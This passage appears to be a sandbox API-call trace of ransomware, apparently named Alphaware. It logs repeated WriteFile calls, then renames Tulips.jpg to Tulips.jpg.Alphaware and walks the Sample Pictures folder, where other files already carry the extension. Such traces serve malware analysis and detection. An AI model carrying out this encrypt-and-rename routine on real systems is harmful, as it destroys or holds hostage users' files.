lpOverlapped=0x0) returned 1 [0102.651] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.651] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.652] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.652] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.652] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.652] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.652] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.653] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.658] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.658] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.659] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.659] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.659] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.659] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.660] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.660] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.660] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.660] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.661] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.661] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.661] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.661] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.662] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.662] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.662] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.663] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.663] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.663] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.663] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.664] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.664] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.664] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.664] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.665] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.665] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.665] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.665] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.666] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.666] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.666] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.666] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.667] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.667] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.667] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.667] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.668] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.668] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.668] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.668] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.669] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.669] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.669] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.669] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.670] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.670] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.670] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.671] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.671] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.671] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.671] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.672] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.672] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.672] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.672] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.673] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.673] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.673] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.673] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.674] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.674] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.674] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.674] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.676] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.676] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.677] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.677] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.677] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.677] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.678] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.678] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.678] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e978, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e978*=0x1000, lpOverlapped=0x0) returned 1 [0102.679] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e958*=0x2a0, lpOverlapped=0x0) returned 1 [0102.679] CloseHandle (hObject=0x260) returned 1 [0102.689] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", nBufferLength=0x105, lpBuffer=0x23e670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", lpFilePart=0x0) returned 0x33 [0102.689] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.Alphaware", nBufferLength=0x105, lpBuffer=0x23e670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.Alphaware", lpFilePart=0x0) returned 0x3d [0102.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0102.689] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8f657a20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xca2a0)) returned 1 [0102.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0102.690] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.Alphaware" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.alphaware")) returned 1 [0102.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0102.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures", nBufferLength=0x105, lpBuffer=0x23e640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures", lpFilePart=0x0) returned 0x28 [0102.691] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\*" (normalized: "c:\\users\\public\\pictures\\sample pictures\\*"), lpFindFileData=0x23e940 | out: lpFindFileData=0x23e940*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8f657a20, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8f657a20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a4f0 [0102.691] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8f657a20, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8f657a20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.692] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8eb7b5c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x11e508, dwReserved0=0x0, dwReserved1=0x0, cFileName="Chrysanthemum.jpg.Alphaware", cAlternateFileName="CHRYSA~1.ALP")) returned 1 [0102.692] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, 